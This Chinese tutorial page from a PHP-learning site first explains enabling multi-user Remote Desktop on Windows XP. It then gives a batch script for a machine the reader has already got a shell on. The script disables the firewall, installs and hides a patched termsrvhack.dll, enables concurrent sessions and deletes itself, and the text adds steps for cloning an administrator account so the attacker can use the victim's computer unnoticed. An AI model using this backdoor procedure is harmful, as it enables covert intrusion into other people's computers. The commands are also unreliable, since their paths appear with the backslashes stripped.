网站地图    收藏   

主页 > 后端 > 网站安全 >

Windows XP 3389(终端)多用户登陆 - Windows操作系统

来源:自学PHP网    时间:2015-04-17 19:05 作者: 阅读:

[导读] 第一步:首先是在Windows XP上安装SP2正式版,按照常规方式安装即可,这里不再赘述。第二步:准备一份版本较早的SP2终端服务器软件(据说从Build 2082开始该功能就被禁止了,所以最好使用之...

第一步:首先是在Windows XP上安装SP2正式版,按照常规方式安装即可,这里不再赘述。

第二步:准备一份版本较早的SP2终端服务器软件(据说从Build 2082开始该功能就被禁止了,所以最好使用之前版本),中文SP2测试版较难找到,我用的是英文版Build 2055,运行之后没有发现任何问题。你可以从http://www.msfn.org/board/index.php?s=85a71ca2987c89886c99733154ae685f&act=Attach&type=post&id=161513下载Build 2055的终端服务器执行文件TermSrv.DLL。从这个链接下载来的是一个扩展名为.DL_的文件,你可以把它的扩展名改成ZIP文件,然后用WinRAR解开它。

第三步:接下来,以安全模式启动Windows XP,如果有多个操作系统,可以启动另一个能访问Windows XP系统分区的系统(除非安装了第三方工具软件,否则Windows 98不能访问NTFS分区,因此Windows 98可能没用)。然后,把Windows XP里面SP2正式版的所有 TermSrv.DLL备份一下,在所有TermSrv.DLL文件出现的位置,用Build 2055版本的TermSrv.DLL覆盖。通常, TermSrv.DLL至少出现在二个位置,分别是:Windowssystem32,Windowssystem32dllcache。凡是原来有TermSrv.DLL的地方,就用Build 2055版本的TermSrv.DLL覆盖。

  第四步:以正常模式启动Windows XP,如果系统的文件保护功能提示说TermSrv.DLL文件已被修改,并询问是否要复原,选择否。

  第五步:最后还要修改一下注册表,增加终端服务器的多用户许可。鉴于修改注册表比较麻烦而且容易出错,你可以用下面的批命令修改注册表:

  @echo off
  setlocal
  set regkey="HKLMSYSTEMCurrentControlSetControlTerminal ServerLicensing Core"
  reg add %regkey% /v EnableConcurrentSessions /T REG_DWORD /D 1 /f
  endlocal

  将上述内容保存为一个批命令文件,如AA.BAT,双击执行一下就可以了。

我不推荐这种做法 ,太烦锁了,而且还要让系统重起过。我们可以写一个批处理文件使系统不用重起就实现XP多用户登陆,首先我们先来了解一个对注册表操作的命令参数:

REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]

KeyName [\Machine]FullKey
Machine 远程机器名 - 忽略默认到当前机器。远程机器上
只有 HKLM 和 HKU。
FullKey ROOTKEYSubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey 所选 ROOTKEY 下注册表项的完整名。

/v 所选项之下要添加的值名。

/ve 为注册表项添加空白值名(默认)。

/t RegKey 数据类型
[ REG_SZ | REG_MULTI_SZ | REG_EXPAND_SZ |
REG_DWORD | REG_BINARY | REG_NONE ]
如果忽略,则采用 REG_SZ。

/s 指定一个在 REG_MULTI_SZ 数据字符串中用作分隔符的字符
如果忽略,则将 "\0" 用作分隔符。

/d 要分配给添加的注册表 ValueName 的数据。

/f 不用提示就强行覆盖现有注册表项。

例如:

REG ADD \ABCHKLMSoftwareMyCo
添加远程机器 ABC 上的一个注册表项 HKLMSoftwareMyCo

REG ADD HKLMSoftwareMyCo /v Data /t REG_BINARY /d fe340ead
添加一个值(名称: Data,类型: REG_BINARY,数据: fe340ead)

REG ADD HKLMSoftwareMyCo /v MRU /t REG_MULTI_SZ /d fax\0mail
添加一个值(名称: MRU,类型: REG_MUTLI_SZ,数据: fax\0mail\0\0)

REG ADD HKLMSoftwareMyCo /v Path /t REG_EXPAND_SZ /d ^%systemroot^%
添加一个值(名称: Path,类型: REG_EXPAND_SZ,数据: %systemroot%)
注意: 在扩充字符串中使用插入符号 ( ^ )

为了让系统不重起,我们可以用shutdown -a 这个命令。
根据上面找来的资料,我们可以编写一个批处理,实现XP系统多用户登陆而又不用重起系统。
代码如下:

@echo off
@net stop sharedaccess
@ntsd -c q -p "pid"
@reg add HKLMSOFTWAREMicrosoftWindows" "NTCurrentVersionWinlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@reg add HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@reg add HKLMSYSTEMCurrentControlSetcontrol erminal" "serverLicensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@reg add HKLMSYSTEMCurrentControlSetServicesTermServiceParameters /v serviceDll /t REG_EXPAND_SZ /d %SystemRoot%system32 ermsrvhack.dll /f
@copy c: ermsrvhack.dll c:windowssystem32dllcache ermsrvhack.dll
@attrib +h +s +r c:windowssystem32dllcache ermsrvhack.dll
@copy c: ermsrvhack.dll c:windowssystem32 ermsrvhack.dll
@attrib +h +s +r c:windowssystem32 ermsrvhack.dll
@shutdown -a
@del c: ermsrvhack.dll
@net start termservice
@del c:3389.bat

其中“pid"是要替换成TermService服务的PID号,可以用命令tasklist/svc命令得到。当然win2000和以下系统是没有tasklist命令的。
具体的操作方法是
先要得到对方的一个SHELL,然后在shell下用第三方软件打开终端服务,先不要改变默认的3389端口,不然要重起后才登陆,再建一个或克隆一个超级管理员用户。
接下来把下载好的termsrvhack.dll和上面的批处理传到对方的C盘根目录下,然后在shell下运行此批处理。提示成功!
最后打开登陆器,3389终端登陆!
说明一下你登陆进去后在里面的操作和那台电脑的主人操作是互不影响的,他玩他的,你玩你的,呵呵,爽伐?!

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论